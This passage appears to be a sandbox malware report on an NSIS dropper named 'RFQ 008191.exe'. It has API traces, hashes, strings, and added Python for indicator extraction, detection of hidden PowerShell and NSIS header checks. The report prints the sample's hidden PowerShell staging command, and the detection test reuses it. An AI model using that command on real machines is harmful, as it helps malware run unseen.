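• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
• ExitProcess.KERNEL32 ref: 00403B33
"""

# One report line: "• [Part of subcall function XXXXXXXX: ]API.MODULE[(args)], ref: XXXXXXXX".
# This grammar is inferred from the lines above; it is an assumption, not a documented format.
LINE_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s+)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s+(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")      # pointer/integer argument as dumped
WINPATH_RE = re.compile(r'^"?[A-Za-z]:\\')      # drive-letter path, optionally quoted


def parse_api_lines(text):
    """Turn the report's API list into dicts: api, module, args, ref, subcall_of."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append({
            "api": m["api"],
            "module": m["module"],
            "args": args,
            "ref": int(m["ref"], 16),
            "subcall_of": int(m["sub"], 16) if m["sub"] else None,
        })
    return calls


def extract_iocs(calls):
    """Split literal arguments into file-system paths and other strings.
    '?' (unknown) and 8-hex-digit values (pointers, flags) are dropped."""
    paths, strings = set(), set()
    for call in calls:
        for arg in call["args"]:
            if arg in ("", "?") or HEX32_RE.match(arg):
                continue
            (paths if WINPATH_RE.match(arg) else strings).add(arg.strip('"'))
    return {"paths": sorted(paths), "strings": sorted(strings)}


def module_counts(calls):
    """How many calls resolve into each module (KERNEL32 vs KERNELBASE etc.)."""
    return Counter(call["module"] for call in calls)


def copy_then_exec(calls):
    """Pair each CopyFileW with any later CreateProcessW that launches the same
    destination buffer (arguments are dumped as addresses, so equality is on the
    pointer text). Returns (copy_ref, exec_ref) pairs; for the NSIS stub this is
    the ~nsu%X.tmp self-copy being started."""
    hits = []
    for i, call in enumerate(calls):
        if call["api"] != "CopyFileW" or len(call["args"]) < 2:
            continue
        dest = call["args"][1]                      # lpNewFileName
        for later in calls[i + 1:]:
            # lpApplicationName or lpCommandLine of the later CreateProcessW
            if later["api"] == "CreateProcessW" and dest in later["args"][:2]:
                hits.append((call["ref"], later["ref"]))
    return hits


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print(f"{len(calls)} calls, modules: {dict(module_counts(calls))}")
    print("IOCs:", extract_iocs(calls))
    for copy_ref, exec_ref in copy_then_exec(calls):
        print(f"copy at {copy_ref:08X} executed by CreateProcessW at {exec_ref:08X}")
```

Because the report dumps pointer arguments as addresses, the copy-then-exec check compares the buffer address shared by CopyFileW and CreateProcessW (0042C800 above) rather than a file name; the same buffer also appears in the later DeleteFileW and CloseHandle calls, which is what you would expect from a stub cleaning up its own temp copy.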
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$~nsu%X.tmp
                                                                    • API String ID: 1813718867-2592931743
                                                                    • Opcode ID: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                    • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                    • Opcode Fuzzy Hash: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                    • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
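The `String ID` entry above carries the detection-relevant artifact: `powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\...` shows that the installer's next stage is a hidden PowerShell that reads a staged file out of a Temp subdirectory (the string is truncated in the report, so the rest of the command is not known from this page). A process-creation check keyed on that combination is shown below. It is an added example, not the Sigma rules the report refers to and not Joe Sandbox code; the events are constructed using Sysmon Event ID 1 field names, and the paths below Temp\ and the benign command lines are invented for the test rather than taken from the report.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon Event ID 1 field names).
# Event 0 mirrors the report's string; the path below Temp\ and events 1-3 are
# invented for this example and do not come from the report.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\RFQ 008191.exe",
     "CommandLine": r'''powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\example\stage1.txt'"'''},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Program Files\Vendor\maint.ps1"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\App\app.exe",
     "CommandLine": r'''powershell.exe -w hidden -c "Get-Content 'C:\ProgramData\app\config.json'"'''},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c type C:\Users\user\AppData\Local\Temp\log.txt"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
USER_WRITABLE = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\")
# Get-Content and its built-in aliases, followed by a quoted path argument.
CONTENT_READ_RE = re.compile(
    r"""\b(?:get-content|gc|cat|type)\b[^'"]*['"]([^'"]+)['"]""", re.IGNORECASE)


def hidden_window(cmdline):
    """True when the console window is requested hidden. powershell.exe accepts
    any unambiguous prefix of -WindowStyle (-w, -win, ...), so match by prefix."""
    toks = cmdline.split()
    for i in range(len(toks) - 1):
        flag = toks[i].lower()
        if flag.startswith("-") and len(flag) > 1 and "windowstyle".startswith(flag[1:]):
            return toks[i + 1].strip("\"'").lower() == "hidden"
    return False


def temp_file_read(cmdline):
    """Return the quoted path handed to Get-Content/gc/cat/type if one of its
    components is a Temp directory, else None."""
    for m in CONTENT_READ_RE.finditer(cmdline):
        path = m.group(1)
        if "temp" in (part.lower() for part in PureWindowsPath(path).parts):
            return path
    return None


def untrusted_parent(parent_image):
    """Parent binary lives in a user-writable location (Desktop, Downloads, Temp)."""
    p = parent_image.lower()
    return any(marker in p for marker in USER_WRITABLE)


def evaluate(event):
    """Return (indicators, alert) for one process-creation event."""
    if PureWindowsPath(event["Image"]).name.lower() not in POWERSHELL:
        return [], False
    cmd = event["CommandLine"]
    indicators = []
    if hidden_window(cmd):
        indicators.append("hidden_window")
    read_path = temp_file_read(cmd)
    if read_path:
        indicators.append(f"reads_temp_file:{read_path}")
    if untrusted_parent(event["ParentImage"]):
        indicators.append("parent_in_user_writable_dir")
    # Alert on the combination the report shows (hidden PowerShell reading a
    # staged file out of Temp); either half alone is common in admin scripting.
    return indicators, ("hidden_window" in indicators and read_path is not None)


def triage(events):
    """Indices of the events that alert."""
    return [i for i, ev in enumerate(events) if evaluate(ev)[1]]


if __name__ == "__main__":
    for i, ev in enumerate(EVENTS):
        indicators, alert = evaluate(ev)
        print(f"[{i}] alert={alert} {indicators}")
```

The parent-image indicator is recorded but deliberately not required for the alert: in this report the parent is the sample on the user's Desktop, but the same staging pattern is also launched from Downloads or from a Temp extraction directory, and keying the rule on the Desktop path alone would miss those. Only the full `-WindowStyle hidden` value is matched; value abbreviations are not handled, which is a simplification of this example rather than a statement about what powershell.exe accepts.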

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 151: function starting at 00405705 (first block 405705-405720). Node/edge data for the interactive renderer omitted; the graph covers the details list-view setup (GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageW), a worker thread started at 4058b8-4058da (CreateThread, CloseHandle), and a right-click popup menu (CreatePopupMenu, AppendMenuW, TrackPopupMenu at 405992-4059e7) whose action copies the list contents to the clipboard (OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock at 405a26-405a49; GlobalUnlock, SetClipboardData, CloseClipboard at 405a74-405a88). The APIs are listed below.
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                    • GetClientRect.USER32(?,?), ref: 004057AF
                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                      • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                                    • ShowWindow.USER32(00000000), ref: 004058FE
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                    • ShowWindow.USER32(00000008), ref: 0040594D
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                    • CreatePopupMenu.USER32 ref: 00405992
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                    • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                    • EmptyClipboard.USER32 ref: 00405A2D
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                    • CloseClipboard.USER32 ref: 00405A88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: {
                                                                    • API String ID: 590372296-366298937
                                                                    • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                    • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                    • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                    • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 00406c5f (rendered as an image in the original report; the node and edge data are not reproduced here; the only API calls in this graph are GlobalAlloc and GlobalFree)
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                    • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                    • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                    • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 0040689e (rendered as an image in the original report; the node and edge data are not reproduced here, the calls it makes are listed under APIs below)
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068A9
                                                                    • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: X_B
                                                                    • API String ID: 2295610775-941606717
                                                                    • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                    • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                    • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                    • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 00403fc1 (rendered as an image in the original report; the node and edge data are not reproduced here, the calls it makes are listed under APIs below)
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                    • ShowWindow.USER32(?), ref: 0040401D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                    • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                    • DestroyWindow.USER32 ref: 0040405C
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                    • GetDlgItem.USER32(?,?), ref: 00404094
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                    • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                    • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                                    • EnableWindow.USER32(?,?), ref: 004042C3
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                    • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                    • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                    • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID:
                                                                    • API String ID: 121052019-0
                                                                    • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                    • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                    • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                    • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

                                                                    Control-flow Graph

                                                                    Control-flow graph of the function at 00403c13 (rendered as an image in the original report; the node and edge data are not reproduced here, the calls it makes are listed under APIs below)
                                                                    APIs
                                                                      • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                      • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                    • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RFQ 008191.exe",00008001), ref: 00403C94
                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420), ref: 00403D14
                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes), ref: 00403D7B
                                                                      • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                    • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                    • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                    • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-2058368676
                                                                    • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                    • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                    • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                    • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

                                                                    Control-flow Graph

                                                                    Control-flow graph (rendered in the original report) for the function at 0x004030A2 (0x004030A2-0x004032D6): the NSIS stub's self-check. It calls the internal routines 406031, 406541, 405E5C, 40303E, 4034BE, 4034D4, 4032D9, 405FEC and 406A22: GetModuleFileNameW and an open of its own image (failure takes the 0x004030F2 path, "Error launching installer"), GetFileSize, then a block-wise scan for the first-header magic compared as the three dwords "Inst", "soft" and "Null" (xrefs 00403187, 00403190, 00403199), GlobalAlloc for the decompressed header, and a CRC pass over the file with SetFilePointer; a missing header or a CRC mismatch takes the 0x00403278 path, "Installer integrity check has failed". The APIs are listed below.
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004030B3
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                      • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                      • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                                    Strings
                                                                    • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                                                    • Inst, xrefs: 00403187
                                                                    • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author, xrefs: 00403278
                                                                    • Null, xrefs: 00403199
                                                                    • "C:\Users\user\Desktop\RFQ 008191.exe", xrefs: 004030A8
                                                                    • Error launching installer, xrefs: 004030F2
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004030A9
                                                                    • soft, xrefs: 00403190
                                                                    Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as the first function above (00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; hcaresult_0_2_400000_RFQ 008191.jbxd)
                                                                    Similarity
                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                                    • API String ID: 2803837635-4175521791
                                                                    • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                    • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                    • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                    • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
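The routine above is the stub's search for the NSIS first header followed by its CRC check. The Python below is an added example, not code from this report, from NSIS or from the sample: it locates the first header the way the stub does (only at 512-byte block boundaries, accepting the 0xDEADBEEF signature and the "NullsoftInst" magic whose three dwords appear above as the "Inst", "soft" and "Null" xrefs) and applies the same two integrity conditions, that the declared payload fits inside the file and that the trailing CRC32 matches. The field layout and flag bits follow NSIS's Source/exehead/fileform.h; the input is a constructed stand-in blob from build_sample(), not a real installer.

```python
# Added example (not from the Joe Sandbox report, NSIS or the sample): reproduce the
# first-header search and integrity check of an NSIS installer stub in Python.
import binascii
import struct

# firstheader layout and flag bits as defined in NSIS Source/exehead/fileform.h
FH_SIG = 0xDEADBEEF                    # firstheader.siginfo
FH_MAGIC = b"NullsoftInst"             # nsinst[0..2] == "Null", "soft", "Inst"
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8
FH_STRUCT = struct.Struct("<II12sII")  # flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
SCAN_STEP = 512                        # the stub reads 512-byte blocks until the header is found


def find_first_header(image: bytes):
    """Return (offset, fields) for the NSIS first header, or None when absent.

    Mirrors the stub: the header is only looked for at 512-byte block starts
    and is accepted when the signature and the three magic dwords match.
    """
    for pos in range(0, len(image) - FH_STRUCT.size + 1, SCAN_STEP):
        flags, sig, magic, header_len, total_len = FH_STRUCT.unpack_from(image, pos)
        if sig == FH_SIG and magic == FH_MAGIC:
            return pos, {"flags": flags, "header_len": header_len, "total_len": total_len}
    return None


def integrity_ok(image: bytes, offset: int, fields: dict) -> bool:
    """The check behind "Installer integrity check has failed": the declared payload
    must fit inside the file, and unless FH_FLAGS_NO_CRC is set the CRC32 stored in
    the last four bytes must equal the CRC32 of everything before them."""
    if offset + fields["total_len"] > len(image):
        return False
    if fields["flags"] & FH_FLAGS_NO_CRC:
        return True
    stored = struct.unpack_from("<I", image, len(image) - 4)[0]
    return binascii.crc32(image[:-4]) == stored


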